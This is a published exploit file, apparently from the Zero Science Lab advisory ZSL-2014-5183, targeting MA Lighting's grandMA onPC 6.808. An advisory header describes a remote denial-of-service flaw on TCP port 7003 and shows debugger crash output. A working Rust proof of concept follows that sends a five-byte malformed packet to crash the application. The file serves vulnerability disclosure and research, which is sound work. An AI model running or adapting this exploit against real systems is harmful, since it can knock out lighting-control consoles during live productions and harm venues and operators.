/*
MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit
Vendor: MA Lighting Technology GmbH
Product web page: http://www.malighting.com
Affected version: grandMA series 1 onPC Software 6.808 (6.801)
Summary: The grandMA onPC software incorporates all functions of a grandMA
console and offers you its full potential on your notebook or PC. You can
use grandMA onPC for running, programming or offline pre-programming, as
well as a smart backup solution within the grandMA system. With the MA onPC
command wing and MA onPC fader wing MA Lighting has developed a sophisticated
hardware extension perfectly suited for the grandMA onPC software.
Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
issue when processing socket connection negotiation. This issue occurs when
the application handles a single malformed packet over TCP port 7003, resulting
in a crash.
===========================================================================
(1324.be4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ntdll!RtlEnterCriticalSection+0x12:
77ce22c2 f00fba3000 lock btr dword ptr [eax],0 ds:002b:3535393f=????????
--
303.640 GMA : RR NEW STATION IN NETWORK 127.0.0.1(100) AS Standalone
367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
367.180 CC : ******* EXCEPTION **************************
367.180 CC : * ACCESS_VIOLATION
367.180 CC : * EAX = 37363341 EBX = 6D856B0
367.180 CC : * ECX = 37363339 EDX = B78F41C
367.180 CC : * ESI = 37363341 EDI = 3736333D
367.180 CC : * DESKTYP : GMA [Windows]
367.180 CC : * VERSION : 6.808 STREAMING : 6801
367.180 CC : ********************************************
367.240 CC : 0x775522c2 RtlEnterCriticalSection() + 0x12
===========================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5183
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php
31.03.2014
*/
use std::io::net::ip::SocketAddr;
use std::io::net::tcp::TcpStream;
fn bann() {
println!("
+======================================+
| grandMA onPC 6.808 Denial of Service |
|--------------------------------------|
| |
| ID: ZSL-2014-5183 |
+======================================+
");
}
fn main() {
bann();
println!("\n[*] Sending packet to local host on tcp port 7003\n");
let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
let mut socket = TcpStream::connect(addr).unwrap();
socket.write(bytes!("\x74\x30\x30\x74\x21"));
println!("[*] Crashed!\n");
}